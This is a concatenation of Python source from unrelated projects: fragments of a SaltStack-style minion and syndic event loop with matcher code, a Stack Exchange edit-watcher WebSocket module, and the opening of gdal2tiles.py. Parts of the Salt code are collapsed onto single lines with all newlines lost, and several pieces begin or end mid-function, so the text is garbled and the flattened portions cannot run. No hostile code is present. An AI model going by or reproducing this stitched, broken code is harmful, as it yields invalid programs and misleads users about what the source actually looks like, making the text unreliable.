schedule=schedule) elif package.startswith('__master_connected'): # handle this event only once. 
otherwise it will pollute the log if not self.connected: log.info('Connection to master {0} re-established'.format(self.opts['master'])) self.connected = True # modify the __master_alive job to only fire, # if the connection is lost again schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master_ip': self.opts['master'], 'connected': True} } self.schedule.modify_job(name='__master_alive', schedule=schedule) # Main Minion Tune In def tune_in(self): ''' Lock onto the publisher. This is the main event loop for the minion :rtype : None ''' self._pre_tune() # Properly exit if a SIGTERM is signalled signal.signal(signal.SIGTERM, self.clean_die) log.debug('Minion {0!r} trying to tune in'.format(self.opts['id'])) self._prepare_minion_event_system() self.socket = self.context.socket(zmq.SUB) self._set_reconnect_ivl() self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) self.poller.register(self.epull_sock, zmq.POLLIN) self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() # Make sure to gracefully handle CTRL_LOGOFF_EVENT salt.utils.enable_ctrl_logoff_handler() # On first startup execute a state run if configured to do so self._state_run() loop_interval = int(self.opts['loop_interval']) try: if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds! if self.opts['grains_refresh_every'] > 1: log.debug( 'Enabling the grains refresher. Will run every {0} minutes.'.format( self.opts['grains_refresh_every']) ) else: # Clean up minute vs. minutes in log message log.debug( 'Enabling the grains refresher. 
Will run every {0} minute.'.format( self.opts['grains_refresh_every']) ) self._refresh_grains_watcher( abs(self.opts['grains_refresh_every']) ) except Exception as exc: log.error( 'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format( exc) ) ping_interval = self.opts.get('ping_interval', 0) * 60 ping_at = None while self._running is True: loop_interval = self.process_schedule(self, loop_interval) try: socks = self._do_poll(loop_interval) if ping_interval > 0: if socks or not ping_at: ping_at = time.time() + ping_interval if ping_at < time.time(): log.debug('Ping master') self._fire_master('ping', 'minion_ping') ping_at = time.time() + ping_interval self._do_socket_recv(socks) # Check the event system if socks.get(self.epull_sock) == zmq.POLLIN: package = self.epull_sock.recv(zmq.NOBLOCK) try: self.handle_event(package) self.epub_sock.send(package) except Exception: log.debug('Exception while handling events', exc_info=True) # Add an extra fallback in case a forked process leeks through multiprocessing.active_children() except zmq.ZMQError as exc: # The interrupt caused by python handling the # SIGCHLD. Throws this error with errno == EINTR. # Nothing to receive on the zmq socket throws this error # with EAGAIN. 
def _do_socket_recv(self, socks):
    '''
    Drain one publication from the master PUB socket (if the poller
    reported it readable) and hand the decoded payload off to
    ``self._handle_payload``.

    :param socks: dict of socket -> poll-event flags from Poller.poll()
    :raises Exception: if the multipart message has an unexpected length
    '''
    if socks.get(self.socket) == zmq.POLLIN:
        # topic filtering is done at the zmq level, so we just strip it
        messages = self.socket.recv_multipart(zmq.NOBLOCK)
        messages_len = len(messages)
        # if it was one message, then its old style
        if messages_len == 1:
            payload = self.serial.loads(messages[0])
        # 2 includes a header which says who should do it
        elif messages_len == 2:
            payload = self.serial.loads(messages[1])
        else:
            # BUGFIX: messages_len is already an int; the old code called
            # len(messages_len), raising TypeError instead of this Exception.
            raise Exception(('Invalid number of messages ({0}) in zeromq pub'
                             'message from master').format(messages_len))
        log.trace('Handling payload')
        self._handle_payload(payload)
def __init__(self, opts, **kwargs):
    '''
    Set up a syndic: adjust the options, mark this instance as a
    syndic, then run the normal Minion initialization and attach a
    MasterMinion for local master-side functionality.
    '''
    # force auth_safemode True because Syndic don't support autorestart
    opts['auth_safemode'] = True
    opts['loop_interval'] = 1
    self._syndic = True
    self._syndic_interface = opts.get('interface')
    super(Syndic, self).__init__(opts, **kwargs)
    self.mminion = salt.minion.MasterMinion(opts)
def syndic_cmd(self, data):
    '''
    Take the now clear load and forward it on to the client cmd

    :param data: decoded job load; ``tgt_type`` defaults to 'glob'
    '''
    # Set up default tgt_type
    if 'tgt_type' not in data:
        data['tgt_type'] = 'glob'
    kwargs = {}
    # optionally add a few fields to the publish data
    for field in ('master_id',  # which master the job came from
                  'user',       # which user ran the job
                  ):
        if field in data:
            kwargs[field] = data[field]
    # BUGFIX: 'user' must reach pub() exactly once. The old code passed
    # user=data.get('user', '') explicitly AND forwarded **kwargs, so any
    # load that contained 'user' raised TypeError ("multiple values for
    # keyword argument 'user'"). Default it into kwargs instead.
    kwargs.setdefault('user', data.get('user', ''))
    # Send out the publication
    self.local.pub(data['tgt'],
                   data['fun'],
                   data['arg'],
                   data['tgt_type'],
                   data['ret'],
                   data['jid'],
                   data['to'],
                   **kwargs)
self._process_cmd_socket() except zmq.ZMQError: yield True except Exception: log.critical( 'An exception occurred while polling the minion', exc_info=True ) yield True # Syndic Tune In def tune_in(self): ''' Lock onto the publisher. This is the main event loop for the syndic ''' signal.signal(signal.SIGTERM, self.clean_die) log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id'])) self._init_context_and_poller() # Instantiate the local client self.local = salt.client.get_local_client(self.opts['_minion_conf_file']) self.local.event.subscribe('') self.local.opts['interface'] = self._syndic_interface # register the event sub to the poller self.poller.register(self.local.event.sub) # Start with the publish socket # Share the poller with the event object self.socket = self.context.socket(zmq.SUB) self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) # Send an event to the master that the minion is live self._fire_master_syndic_start() # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() loop_interval = int(self.opts['loop_interval']) self._reset_event_aggregation() while True: try: # Do all the maths in seconds timeout = loop_interval if self.event_forward_timeout is not None: timeout = min(timeout, self.event_forward_timeout - time.time()) if timeout >= 0: log.trace('Polling timeout: %f', timeout) socks = dict(self.poller.poll(timeout * 1000)) else: # This shouldn't really happen. # But there's no harm being defensive log.warning('Negative timeout in syndic main loop') socks = {} if socks.get(self.socket) == zmq.POLLIN: self._process_cmd_socket() if socks.get(self.local.event.sub) == zmq.POLLIN: self._process_event_socket() if self.event_forward_timeout is not None and \ self.event_forward_timeout < time.time(): self._forward_events() # We don't handle ZMQErrors like the other minions # I've put explicit handling around the receive calls # in the process_*_socket methods. 
def _process_cmd_socket(self):
    '''
    Receive one publication from the upstream master and dispatch it.
    Silently returns on spurious wakeups (EAGAIN) or signals (EINTR).

    :raises SaltSyndicMasterError: on a multipart message of invalid length
    '''
    try:
        messages = self.socket.recv_multipart(zmq.NOBLOCK)
        messages_len = len(messages)
        idx = None
        if messages_len == 1:
            idx = 0
        elif messages_len == 2:
            idx = 1
        else:
            raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
        payload = self.serial.loads(messages[idx])
    except zmq.ZMQError as e:
        # Swallow errors for bad wakeups or signals needing processing
        if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
            raise
        # BUGFIX: nothing was received, so 'payload' was never bound;
        # falling through used to raise UnboundLocalError below.
        return
    log.trace('Handling payload')
    self._handle_payload(payload)
def _forward_events(self):
    '''
    Flush the aggregated raw events and per-jid returns up to this
    syndic's master, then reset the aggregation buffers.
    '''
    log.trace('Forwarding events')
    if self.raw_events:
        self._fire_master(events=self.raw_events,
                          pretag=tagify(self.opts['id'], base='syndic'),
                          )
    # Push each aggregated job return upstream.
    for jid, jid_ret in self.jids.items():
        self._return_pub(jid_ret, '_syndic_return')
    self._reset_event_aggregation()
def _connect_to_master(self, master):
    '''
    Attempt to connect to master, including back-off for each one

    return boolean of whether you connected or not
    '''
    if master not in self.master_syndics:
        log.error('Unable to connect to {0}, not in the list of masters'.format(master))
        return False

    entry = self.master_syndics[master]
    # if we need to be dead for a while, stay that way
    if entry['dead_until'] > time.time():
        return False
    # Honour the back-off window before re-trying authentication.
    if time.time() - entry['auth_wait'] <= entry.get('last', 0):
        return False
    try:
        syndic = Syndic(entry['opts'],
                        timeout=self.SYNDIC_CONNECT_TIMEOUT,
                        safe=False,
                        )
        entry['syndic'] = syndic
        entry['generator'] = syndic.tune_in_no_block()
        entry['auth_wait'] = self.opts['acceptance_wait_time']
        entry['dead_until'] = 0
        return True
    except SaltClientError:
        log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master))
        # re-use auth-wait as backoff for syndic
        entry['dead_until'] = time.time() + entry['auth_wait']
        if entry['auth_wait'] < self.opts['acceptance_wait_time_max']:
            entry['auth_wait'] += self.opts['acceptance_wait_time']
    return False
def iter_master_options(self, master_id=None):
    '''
    Iterate (in order) over your options for master

    Yields ``(master_id, syndic_dict)`` pairs, starting with the
    requested master when it is known, then the rest in shuffled order.
    '''
    remaining = list(self.master_syndics.keys())
    shuffle(remaining)
    if master_id in self.master_syndics:
        # The requested master goes first; don't yield it twice.
        remaining.remove(master_id)
    else:
        master_id = remaining.pop(0)
    yield master_id, self.master_syndics[master_id]
    for candidate in remaining:
        yield candidate, self.master_syndics[candidate]
# But there's no harm being defensive log.warning('Negative timeout in syndic main loop') socks = {} # check all of your master_syndics, have them do their thing for master_id, syndic_dict in self.master_syndics.items(): # if not connected, lets try if 'generator' not in syndic_dict: # if we couldn't connect, lets try later if not self._connect_to_master(master_id): continue next(syndic_dict['generator']) # events if socks.get(self.local.event.sub) == zmq.POLLIN: self._process_event_socket() if (self.event_forward_timeout is not None and self.event_forward_timeout < time.time()): self._forward_events() # We don't handle ZMQErrors like the other minions # I've put explicit handling around the receive calls # in the process_*_socket methods. If we see any other # errors they may need some kind of handling so log them # for now. except Exception: log.critical( 'An exception occurred while polling the syndic', exc_info=True ) def _process_event_socket(self): tout = time.time() + self.opts['syndic_max_event_process_time'] while tout > time.time(): try: event = self.local.event.get_event_noblock() except zmq.ZMQError as e: # EAGAIN indicates no more events at the moment # EINTR some kind of signal maybe someone trying # to get us to quit so escape our timeout if e.errno == errno.EAGAIN or e.errno == errno.EINTR: break raise log.trace('Got event {0}'.format(event['tag'])) if self.event_forward_timeout is None: self.event_forward_timeout = ( time.time() + self.opts['syndic_event_forward_timeout'] ) if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']: if 'jid' not in event['data']: # Not a job return continue jdict = self.jids.setdefault(event['tag'], {}) if not jdict: jdict['__fun__'] = event['data'].get('fun') jdict['__jid__'] = event['data']['jid'] jdict['__load__'] = {} fstr = '{0}.get_jid'.format(self.opts['master_job_cache']) jdict['__load__'].update( self.mminion.returners[fstr](event['data']['jid']) ) if 'master_id' in event['data']: # __'s to make 
def glob_match(self, tgt):
    '''
    Returns true if the passed glob matches the id
    '''
    # A non-string target can never glob-match a minion id.
    return isinstance(tgt, str) and fnmatch.fnmatch(self.opts['id'], tgt)
def data_match(self, tgt):
    '''
    Match based on the local data store on the minion

    ``tgt`` has the form ``key:pattern``; the value fetched via
    ``data.getval`` is matched by glob (scalars), case-insensitive
    glob on members (lists) or key containment (dicts).
    '''
    # Lazily load execution modules so data.getval is available.
    if self.functions is None:
        self.functions = salt.loader.minion_mods(self.opts)
    parts = tgt.split(':')
    if len(parts) < 2:
        return False
    key, pattern = parts[0], parts[1]
    val = self.functions['data.getval'](key)
    if val is None:
        # The value is not defined
        return False
    if isinstance(val, list):
        # We are matching a single component to a single list member
        want = pattern.lower()
        return any(fnmatch.fnmatch(str(member).lower(), want)
                   for member in val)
    if isinstance(val, dict):
        return pattern in val
    return bool(fnmatch.fnmatch(val, pattern))
ipcidr_match(self, tgt): ''' Matches based on ip address or CIDR notation ''' num_parts = len(tgt.split('/')) if num_parts > 2: # Target is not valid CIDR return False elif num_parts == 2: # Target is CIDR return salt.utils.network.in_subnet( tgt, addrs=self.opts['grains'].get('ipv4', []) ) else: # Target is an IPv4 address import socket try: socket.inet_aton(tgt) except socket.error: # Not a valid IPv4 address return False else: return tgt in self.opts['grains'].get('ipv4', []) def range_match(self, tgt): ''' Matches based on range cluster ''' if HAS_RANGE: range_ = seco.range.Range(self.opts['range_server']) try: return self.opts['grains']['fqdn'] in range_.expand(tgt) except seco.range.RangeException as exc: log.debug('Range exception in compound match: {0}'.format(exc)) return False return False def compound_match(self, tgt): ''' Runs the compound target check ''' if not isinstance(tgt, string_types): log.debug('Compound target received that is not a string') return False ref = {'G': 'grain', 'P': 'grain_pcre', 'I': 'pillar', 'L': 'list', 'S': 'ipcidr', 'E': 'pcre'} if HAS_RANGE: ref['R'] = 'range' results = [] opers = ['and', 'or', 'not', '(', ')'] tokens = tgt.split() for match in tokens: # Try to match tokens from the compound target, first by using # the 'G, X, I, L, S, E' matcher types, then by hostname glob. 
if '@' in match and match[1] == '@': comps = match.split('@') matcher = ref.get(comps[0]) if not matcher: # If an unknown matcher is called at any time, fail out return False results.append( str( getattr(self, '{0}_match'.format(matcher))( '@'.join(comps[1:]) ) ) ) elif match in opers: # We didn't match a target, so append a boolean operator or # subexpression if results or match in ['(', ')']: if match == 'not': if results[-1] == 'and': pass elif results[-1] == 'or': pass else: results.append('and') results.append(match) else: # seq start with oper, fail if match not in ['(', ')']: return False else: # The match is not explicitly defined, evaluate it as a glob results.append(str(self.glob_match(match))) results = ' '.join(results) try: return eval(results) # pylint: disable=W0123 except Exception: log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results)) return False return False def nodegroup_match(self, tgt, nodegroups): ''' This is a compatibility matcher and is NOT called when using nodegroups for remote execution, but is called when the nodegroups matcher is used in states ''' if tgt in nodegroups: return self.compound_match( salt.utils.minions.nodegroup_comp(tgt, nodegroups) ) return False class ProxyMinion(Minion): ''' This class instantiates a 'proxy' minion--a minion that does not manipulate the host it runs on, but instead manipulates a device that cannot run a minion. ''' def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231 ''' Pass in the options dict ''' self._running = None # Warn if ZMQ < 3.2 if HAS_ZMQ: try: zmq_version_info = zmq.zmq_version_info() except AttributeError: # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to # using zmq.zmq_version() and build a version info tuple. zmq_version_info = tuple( [int(x) for x in zmq.zmq_version().split('.')] ) if zmq_version_info < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! 
There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) # Late setup the of the opts grains, so we can log from the grains # module # print opts['proxymodule'] fq_proxyname = 'proxy.'+opts['proxy']['proxytype'] self.proxymodule = salt.loader.proxy(opts, fq_proxyname) opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy']) opts['id'] = opts['proxyobject'].id(opts) opts.update(resolve_dns(opts)) self.opts = opts self.authenticate(timeout, safe) self.functions, self.returners, self.function_errors = self._load_modules() self.opts['pillar'] = salt.pillar.get_pillar( opts, opts['grains'], opts['id'], opts['environment'], funcs=self.functions ).compile_pillar() self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() self.matcher = Matcher(self.opts, self.functions) self.proc_dir = get_proc_dir(opts['cachedir']) self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners) self.grains_cache = self.opts['grains'] # self._running = True def _prep_mod_opts(self): ''' Returns a copy of the opts with key bits stripped out ''' return super(ProxyMinion, self)._prep_mod_opts() def _load_modules(self, force_refresh=False): ''' Return the functions and the returners loaded up from the loader module ''' return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
# ===== editwatcher.py =====
# coding=utf-8
import json
import os.path
import requests
import time
import threading
# noinspection PyPackageRequirements
import websocket
# noinspection PyPackageRequirements
from bs4 import BeautifulSoup
from urllib.parse import urlparse

import chatcommunicate
import metasmoke
from globalvars import GlobalVars
import datahandling
from helpers import log, add_to_global_bodyfetcher_queue_in_new_thread
from parsing import fetch_post_id_and_site_from_url, to_protocol_relative
from tasks import Tasks


PICKLE_FILENAME = "editActions.p"
DEFAULT_TIMEOUT = 10 * 60  # 10 minutes


# noinspection PyClassHasNoInit,PyBroadException,PyMethodParameters
class EditWatcher:
    """Watch question edits via the Stack Exchange qa.sockets WebSocket.

    Subscriptions are kept in ``self.posts``, a dict mapping the WebSocket
    action string "{site_id}-question-{question_id}" to a tuple
    (site_id, hostname, question_id, max_time), where max_time is the epoch
    time at which the subscription expires. Subscriptions survive restarts
    via a pickle file.
    """

    def __init__(self):
        if GlobalVars.no_edit_watcher:
            self.socket = None
            return
        # Keyed by action "{site_id}-question-{question_id}"; each value is
        # (site_id, hostname, question_id, max_time).
        self.posts = {}
        self.posts_lock = threading.Lock()
        self.save_handle = None
        self.save_handle_lock = threading.Lock()

        try:
            self.socket = websocket.create_connection("wss://qa.sockets.stackexchange.com/")
        except websocket.WebSocketException:
            self.socket = None
            log('error', 'EditWatcher failed to create a websocket connection')

        if datahandling.has_pickle(PICKLE_FILENAME):
            pickle_data = datahandling.load_pickle(PICKLE_FILENAME)
            now = time.time()
            # BUG FIX: pickle_data is a dict, so iterating it directly yields
            # only keys; .items() is required for the (action, value)
            # unpacking. Expired subscriptions (max_time in the past) are
            # dropped on load.
            new_posts = {action: value for action, value in pickle_data.items()
                         if value[-1] > now}
            with self.posts_lock:
                self.posts = new_posts
            for action in new_posts.keys():
                Tasks.do(self._subscribe, action)
            self._schedule_save()

        threading.Thread(name="edit watcher", target=self._start, daemon=True).start()

    def _start(self):
        """Receive loop: answer heartbeats and dispatch edit notifications."""
        while True:
            msg = self.socket.recv()

            if msg:
                msg = json.loads(msg)
                action = msg["action"]

                if action == "hb":
                    # Heartbeat: echo back to keep the connection alive.
                    self.socket.send("hb")
                else:
                    data = json.loads(msg["data"])
                    now = time.time()
                    with self.posts_lock:
                        site_id, hostname, question_id, max_time = self.posts.get(action,
                                                                                  (None, None, None, now))
                        if site_id and max_time <= now:
                            # Subscription expired: drop it and unsubscribe.
                            del self.posts[action]
                            Tasks.do(self._unsubscribe, action)
                    if max_time > now and data["a"] == "post-edit":
                        print('POST-EDIT: Scheduling bodyfetcher for: hostname:', hostname,
                              ':: question_id:', question_id)
                        add_to_global_bodyfetcher_queue_in_new_thread(hostname, question_id, False)

    def subscribe(self, post_url=None, hostname=None, site_id=None, question_id=None, pickle=True,
                  timeout=DEFAULT_TIMEOUT, max_time=None, from_time=None):
        """Subscribe to edit events for a question (or list of questions).

        Either post_url, or question_id together with hostname/site_id, must
        be provided. Answers are resolved to their parent question. The
        subscription lasts until max_time (default: now + timeout).
        """
        if GlobalVars.no_edit_watcher:
            return
        if post_url and not ((hostname or site_id) and question_id):
            post_id, hostname, post_type = fetch_post_id_and_site_from_url(post_url)
            if post_type == "answer":
                question_id = datahandling.get_post_site_id_link((post_id, hostname, post_type))
                if question_id is None:
                    log("warning", "Unable to get question ID when subscribing to: hostname: "
                                   "{} :: post ID:{} when subscribing to {}".format(hostname, post_id,
                                                                                    post_url))
                    return
            else:
                question_id = post_id
                if post_type != "question":
                    log("warning", "tried to edit-watch non-question: hostname: "
                                   "{} :: post ID:{} when subscribing to {}".format(hostname, question_id,
                                                                                    post_url))
                    return
        if not site_id or not hostname:
            # Resolve whichever of (site_id, hostname) is missing from the other.
            with GlobalVars.site_id_dict_lock:
                if not site_id and hostname:
                    site_id = GlobalVars.site_id_dict.get(hostname)
                if site_id and not hostname:
                    hostname = GlobalVars.site_id_dict_by_id.get(site_id)
        if not site_id or not hostname:
            log("warning", "unable to determine a valid site ID or hostname when subscribing to question ID "
                           "{}:: site_id:{}:: hostname:{}:: post_url:{}".format(question_id, site_id,
                                                                                hostname, post_url))
            return

        question_ids = question_id
        if not isinstance(question_ids, list):
            question_ids = [question_id]
        now = time.time()
        if from_time:
            now = from_time
        if not max_time:
            max_time = now + timeout
        updated = False
        to_subscribe = []
        with self.posts_lock:
            for question_id in question_ids:
                action = "{}-question-{}".format(site_id, question_id)
                if action not in self.posts:
                    self.posts[action] = (site_id, hostname, question_id, max_time)
                    to_subscribe.append(action)
                    # BUG FIX: a brand-new subscription is a change that must
                    # trigger a save; the original never set this flag.
                    updated = True
                else:
                    # BUG FIX: max_time is element 3 of the tuple; the
                    # original read element 2 (question_id) here.
                    old_max_time = self.posts[action][3]
                    if max_time > old_max_time:
                        self.posts[action] = (site_id, hostname, question_id, max_time)
                        updated = True

        for action in to_subscribe:
            print('scheduling subscription to action:', action)
            Tasks.do(self._subscribe, action)

        if updated and pickle:
            self._schedule_save()

    def _subscribe(self, action):
        # Send the raw action string to start receiving its events.
        if self.socket:
            print('subscribing to action:', action)
            try:
                self.socket.send(action)
            except websocket.WebSocketException:
                log('error', 'EditWatcher failed to subscribe to {}'.format(action))
        else:
            log('warning', 'EditWatcher tried to subscribe to {}, but no WebSocket available.'.format(action))

    def _schedule_save(self):
        """Debounce pickling: cancel any pending save and queue a new one."""
        with self.save_handle_lock:
            if self.save_handle:
                self.save_handle.cancel()
            # BUG FIX: the original assigned the new task to a local variable,
            # so self.save_handle stayed stale and could never be cancelled.
            self.save_handle = Tasks.do(self._save)

    def _save(self):
        # Snapshot under the lock, pickle outside of it.
        with self.posts_lock:
            copy = self.posts.copy()
        datahandling.dump_pickle(PICKLE_FILENAME, copy)

    def _unsubscribe(self, action):
        # A leading "-" tells the socket server to stop sending this action.
        if self.socket:
            print('UNsubscribing to action:', action)
            try:
                self.socket.send("-" + action)
            except websocket.WebSocketException:
                log('error', 'EditWatcher failed to unsubscribe to {}'.format(action))
        else:
            log('warning', 'EditWatcher tried to unsubscribe to {}, but no WebSocket available.'.format(action))
# ===== gdal2tiles.py =====
#!/home/wilsonsf/environments/my_env/bin/python3 # -*- coding: utf-8 -*- # ****************************************************************************** # $Id$ # # Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/) # Support: BRGM (http://www.brgm.fr) # Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory. # - generate Google Earth metadata (KML SuperOverlay) # - generate simple HTML viewer based on Google Maps and OpenLayers # - support of global tiles (Spherical Mercator) for compatibility # with interactive web maps a la Google Maps # Author: Klokan Petr Pridal, klokan at klokan dot cz # Web: http://www.klokan.cz/projects/gdal2tiles/ # GUI: http://www.maptiler.org/ # ############################################################################### # Copyright (c) 2008, Klokan Petr Pridal # Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. 
# ****************************************************************************** from __future__ import print_function, division import math from multiprocessing import Pipe, Pool, Process, Manager import os import tempfile import threading import shutil import sys from uuid import uuid4 from xml.etree import ElementTree from osgeo import gdal from osgeo import osr try: from PIL import Image import numpy import osgeo.gdal_array as gdalarray numpy_available = True except ImportError: # 'antialias' resampling is not available numpy_available = False __version__ = "$Id$" resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias') profile_list = ('mercator', 'geodetic', 'raster') webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none') threadLocal = threading.local() # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = """ globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles used on the web. It contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:3857) for Google Maps, Yahoo Maps, Bing Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by Klokan Petr Pridal on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. 
In case you use this class in your product, translate it to another language or find it useful for your project please let me know. My email: klokan at klokan dot cz. I would like to know where it was used. Class is available under the open-source GDAL license (www.gdal.org). """ MAXZOOMLEVEL = 32 class GlobalMercator(object): r""" TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:3857. Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay them on top of base maps of those web mapping applications. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in meters XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:387 .----. --------- -- TMS / \ <-> | | <-> /----/ <-> Google \ / | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate extent of Earth in EPSG:3857? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in meters, which is 40 thousand kilometers, the coordinate origin is in the middle of extent. In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom level constants (pixels/meter) for pyramid with EPSG:3857? 
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution is always divided by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile name convention? The tile raster itself is the same (equal extent, projection, pixel size), there is just different identification of the same raster tile. Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ. Google placed the origin [0,0] to the top-left corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yes? Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the web clients like Google Maps are projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if the were on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use the spherical form of projection, not the ellipsoidal form. Since the projection is used only for map display, and not for displaying numeric coordinates, we don't need the extra precision of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion in the Y direction, which is not visually noticeable. How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:3857'. For other GIS programs check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is designated as EPSG:3857. WKT definition is in the official EPSG database. 
Proj4 Text:
        +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
        +k=1.0 +units=m +nadgrids=@null +no_defs

    Human readable WKT format of EPSG:3857:
         PROJCS["Google Maps Global Mercator",
             GEOGCS["WGS 84",
                 DATUM["WGS_1984",
                     SPHEROID["WGS 84",6378137,298.257223563,
                         AUTHORITY["EPSG","7030"]],
                     AUTHORITY["EPSG","6326"]],
                 PRIMEM["Greenwich",0],
                 UNIT["degree",0.0174532925199433],
                 AUTHORITY["EPSG","4326"]],
             PROJECTION["Mercator_1SP"],
             PARAMETER["central_meridian",0],
             PARAMETER["scale_factor",1],
             PARAMETER["false_easting",0],
             PARAMETER["false_northing",0],
             UNIT["metre",1,
                 AUTHORITY["EPSG","9001"]]]
    """

    def __init__(self, tile_size=256):
        "Initialize the TMS Global Mercator pyramid"
        self.tile_size = tile_size
        # 156543.03392804062 for tile_size 256 pixels
        self.initialResolution = 2 * math.pi * 6378137 / self.tile_size
        # 20037508.342789244 (half the circumference of the spherical Earth)
        self.originShift = 2 * math.pi * 6378137 / 2.0

    def LatLonToMeters(self, lat, lon):
        "Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
        mx = lon * self.originShift / 180.0
        my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
        my = my * self.originShift / 180.0
        return mx, my

    def MetersToLatLon(self, mx, my):
        "Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
        lon = (mx / self.originShift) * 180.0
        lat = (my / self.originShift) * 180.0

        # Inverse of the Mercator latitude stretch.
        lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
        return lat, lon

    def PixelsToMeters(self, px, py, zoom):
        "Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
        res = self.Resolution(zoom)
        mx = px * res - self.originShift
        my = py * res - self.originShift
        return mx, my

    def MetersToPixels(self, mx, my, zoom):
        "Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
        res = self.Resolution(zoom)
        px = (mx + self.originShift) / res
        py = (my + self.originShift) / res
        return px, py

    def PixelsToTile(self, px, py):
        "Returns a tile covering region in given pixel coordinates"
        tx = int(math.ceil(px / float(self.tile_size)) - 1)
        ty = int(math.ceil(py / float(self.tile_size)) - 1)
        return tx, ty

    def PixelsToRaster(self, px, py, zoom):
        "Move the origin of pixel coordinates to top-left corner"
        mapSize = self.tile_size << zoom
        return px, mapSize - py

    def MetersToTile(self, mx, my, zoom):
